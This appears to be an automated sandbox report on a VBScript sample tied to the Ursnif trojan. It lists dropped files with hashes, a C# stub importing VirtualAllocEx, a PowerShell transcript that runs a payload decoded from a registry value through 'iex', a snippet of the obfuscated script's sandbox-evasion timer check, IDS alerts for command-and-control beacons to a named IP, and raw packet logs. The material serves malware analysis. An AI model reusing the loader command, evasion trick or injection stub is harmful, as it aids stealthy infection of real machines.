                                                      Entropy (8bit):3.108359816742105
                                                      Encrypted:false
                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryqIak7YnqqndPN5Dlq5J:+RI+ycuZhNLakSdPNnqX
                                                      MD5:7F2F1D7563A69C0467D006CA9148E761
                                                      SHA1:73836577FBECA2D4DA7D6893DAACB5D7E8E94853
                                                      SHA-256:1801E17613A44853806BA80C322FFE78AFEE0B38A28F3B5566DCA60AF92E46F9
                                                      SHA-512:14B7B229F51C302B9312E35EAE60B7C50B72AB5FC1A85D52732B96EEAD6C00923BED4C043DC53309710DD3F5CE9EF1FB67B504A88150B3BF1EC93FE8B0C15204
                                                      Malicious:false
                                                      Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.y.o.z.c.5.b.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.y.o.z.c.5.b.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                      C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.0.cs
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text
                                                      Category:dropped
                                                      Size (bytes):421
                                                      Entropy (8bit):5.017019370437066
                                                      Encrypted:false
                                                      SSDEEP:6:V/DsYLDS81zuJzLHMRSRa+eNMjSSRrLypSRHq1oZ6laAkKFM+Qy:V/DTLDfuxLP9eg5rLy4uMaLXjQy
                                                      MD5:7504862525C83E379C573A3C2BB810C6
                                                      SHA1:3C7E3F89955F07E061B21107DAEF415E0D0C5F5E
                                                      SHA-256:B81B8E100611DBCEC282117135F47C781087BD95A01DC5496CAC6BE334A8B0CC
                                                      SHA-512:BC8C4EAD30E12FB619762441B9E84A4E7DF15D23782F80284378129F95FAD5A133D10C975795EEC6DA2564EC4D7F75430C45CA7113A8BFF2D1AFEE0331F13E76
                                                      Malicious:true
                                                      Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tjuivx. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint yijswysfmu,uint rpdwbh);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr hkhhmwnsoyn,IntPtr xfehjdcey,uint nqamet,uint rvtfunn,uint mlrfbdrm);.. }..}.
                                                      C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):371
                                                      Entropy (8bit):5.229827513162448
                                                      Encrypted:false
                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fDGzxs7+AEszI923fDVyA:p37Lvkmb6KzaWZE2UA
                                                      MD5:3CDF3CDE074518CB1990F196594FF665
                                                      SHA1:44A79FF81BE9B5BA8B4DE4700CF53EEFD5D7E4B8
                                                      SHA-256:FCF3E1EDAE736B975342AFC964055E632CE1261AEC6BA135A92FDC803D8AC482
                                                      SHA-512:EDEBB4EFA9D8A159B0E73167E1249B3B388F9182B7372E11C554056D7395D2FEE776D38CBCFD7656DE16C7ABCD221DF392B21FA1EC85E68595FCC4D6DA800030
                                                      Malicious:false
                                                      Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.0.cs"
                                                      C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.dll
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3584
                                                      Entropy (8bit):2.6415056869367106
                                                      Encrypted:false
                                                      SSDEEP:24:etGSTMOWEey8MTz7X8daP0eWQpiDdWSWtJ0DtkZfdhBy7XI+ycuZhNLakSdPNnq:6x7KMTcd6q6MWPVJdhu1ulLa3Hq
                                                      MD5:FFB187695996965CE5A821FE3117AC10
                                                      SHA1:7C2AF5553CAF28D3B3501A840B579374224F3BDA
                                                      SHA-256:0EA74DC70CE2DFB19E079F878BF3BCBCB9EBD649E4ECE02154BB23F3E7915368
                                                      SHA-512:7AC93A727DA3D782F6CC049258E443ABE0E9661020C439D72643B8B13963970F90A573B953CFC5FCDFD8317E827263521E7207F6AC512EBE159BFF4714D1BF59
                                                      Malicious:false
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...q.;a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......L...#Strings............#US.........#GUID... ...T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......b.........h.....s.....z...........................b.!...b...!.b.&...b.......+.....4.A.....9.......K.......S......................................."..........<Module>.wyozc5bn.dll.tjuivx.W32.ms
                                                      C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.out
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                      Category:modified
                                                      Size (bytes):412
                                                      Entropy (8bit):4.871364761010112
                                                      Encrypted:false
                                                      SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                      MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                      SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                      SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                      SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                      Malicious:false
                                                      Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                      C:\Users\user\Documents\20210910\PowerShell_transcript.932923.ZOkCXrTg.20210910095711.txt
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1191
                                                      Entropy (8bit):5.3076397700168
                                                      Encrypted:false
                                                      SSDEEP:24:BxSA+LDvBBox2DOXUWOLCHGIYBtBCWayHjeTKKjX4CIym1ZJXWZOLCHGIYBtBdG9:BZSv/ooORFeVayqDYB1ZGFeaZZB
                                                      MD5:6934D641AE5F1514B6B7CFEA3791904C
                                                      SHA1:485332B13F51F8C54753232BB4A49B42296FDF2A
                                                      SHA-256:4142579D58D4B4BC9059D401A41E37F67F5FBBB73A616595C041266CB12741A6
                                                      SHA-512:176F77243F96AB018EBF54C314BB1825B616976AF63400349A2E8DC453A8E1985DF3B14211D56AAF95215ABE3F1258A740CE1CCD5DA4BB65837405AC388269F3
                                                      Malicious:false
                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210910095711..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 932923 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 6948..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210910095711..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..**********************

                                                      Static File Info

                                                      General

                                                      File type:ASCII text, with very long lines, with CRLF line terminators
                                                      Entropy (8bit):4.853150436267665
                                                      TrID:
                                                        File name:345678.vbs
                                                        File size:1397341
                                                        MD5:9e6b216f5112b583f035ac621c78ea4e
                                                        SHA1:8e1636abf1eb1dd966dce2b92fd44a1d9a3e32d3
                                                        SHA256:cbf23e2c51909c02fc3898b4fb078cb1fc08935874add1c045c592096ff18379
                                                        SHA512:5fe0568078cadf8a7847f10724e52b050ae14bcba315455476273a712a684d6f87dfb2e58885080fbc046383433afdc4d62c6c7bba858bbf5ed9a058fd088ca5
                                                        SSDEEP:12288:SfCepvwq9BTH3FEN9cy59WSpU9lAR4lYtE9E5rf99b9:ipvp9BT1U9cyjUAvmEZb9
                                                        File Content Preview:IHGsfsedgfssd = Timer()..For hjdHJGASDF = 1 to 7..WScript.Sleep 1000:..Next..frjekgJHKasd = Timer()..if frjekgJHKasd - IHGsfsedgfssd < 5 Then..Do: KJHSGDflkjsd = 4: Loop..End if ..const VSE = 208..const Aeq = 94..pgoTH = Array(UGM,DP,wy,2,yt,2,2,2,vy,2,2,

                                                        File Icon

                                                        Icon Hash:e8d69ece869a9ec4

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                         Timestamp                | Protocol | SID     | Message                                                     | Source Port | Dest Port | Source IP   | Dest IP
                                                         09/10/21-09:57:01.419951 | TCP      | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)   | 49787       | 80        | 192.168.2.5 | 185.251.90.253
                                                         09/10/21-09:57:01.419951 | TCP      | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)   | 49787       | 80        | 192.168.2.5 | 185.251.90.253
                                                         09/10/21-09:57:02.700383 | TCP      | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)   | 49788       | 80        | 192.168.2.5 | 185.251.90.253
                                                         09/10/21-09:57:02.700383 | TCP      | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)   | 49788       | 80        | 192.168.2.5 | 185.251.90.253
                                                         09/10/21-09:57:03.803296 | TCP      | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)   | 49789       | 80        | 192.168.2.5 | 185.251.90.253
                                                         09/10/21-09:57:03.803296 | TCP      | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)   | 49789       | 80        | 192.168.2.5 | 185.251.90.253

                                                        Network Port Distribution

                                                        TCP Packets

                                                        Sep 10, 2021 09:57:02.037430048 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.037451029 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037488937 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037511110 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.037524939 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037563086 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037580967 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.037600994 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037648916 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037666082 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.037691116 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037727118 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037743092 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.037765026 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037803888 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037820101 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.037839890 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037878990 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037894964 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.037915945 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037962914 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037967920 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.038006067 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038042068 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038068056 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.038079977 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038117886 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038137913 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.038152933 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038189888 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038209915 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.038225889 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038273096 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038280964 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.038315058 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038342953 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038372993 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038409948 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038448095 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038486958 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038522959 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038551092 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.038618088 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.088324070 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088386059 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088423967 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088462114 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088500023 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088547945 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088565111 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.088593960 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088607073 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.088627100 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.088633060 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088671923 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088696957 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.088710070 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088746071 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088766098 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.088784933 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088824987 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088845015 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.088872910 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088915110 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088931084 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.088951111 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088990927 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089013100 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.089026928 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089063883 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089081049 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.089101076 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089138985 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089164972 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.089185953 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089229107 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089267015 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.089291096 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089320898 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089358091 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089382887 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.089406967 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089443922 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089446068 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.089482069 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089498043 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.089541912 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.090929985 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.140307903 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.650388002 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.699682951 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.699871063 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.700382948 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.792574883 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.196911097 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.197005033 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.197093964 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.197137117 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.197191000 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.197249889 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.197288036 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.197339058 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.197405100 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.197464943 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.197499037 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.197540045 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.197592020 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.197628021 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.199012995 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.246896029 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.246932030 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.246949911 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.246972084 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.246994972 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247023106 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247047901 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247070074 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247092962 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247137070 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247158051 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.247194052 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247220039 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247248888 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247273922 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247297049 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247320890 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247371912 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.247464895 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.247905970 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247998953 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.248023987 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.248045921 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.248111963 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.296354055 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296397924 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296418905 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296442032 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296463013 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296489954 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296514034 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296535015 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296556950 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296575069 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.296601057 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296622992 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296643019 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296660900 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.296677113 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296701908 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296709061 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.296730995 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296751022 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296771049 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.296789885 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296821117 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296828032 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.296855927 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296883106 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296905994 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.296917915 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296937943 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296962976 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296968937 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.296991110 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297013044 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297022104 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.297043085 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297070026 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297080994 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.297105074 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297126055 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297137022 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.297158003 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297178030 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297185898 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.297213078 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297235966 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297245979 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.297267914 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297287941 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297296047 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.297323942 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297348022 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297357082 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.297379017 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297399998 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297413111 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.297431946 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297465086 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.297518015 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.346594095 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.346687078 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.346817017 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.346839905 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.346884012 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.346914053 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.346942902 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.346976042 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347012043 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347043991 CEST4978880192.168.2.5185.251.90.253
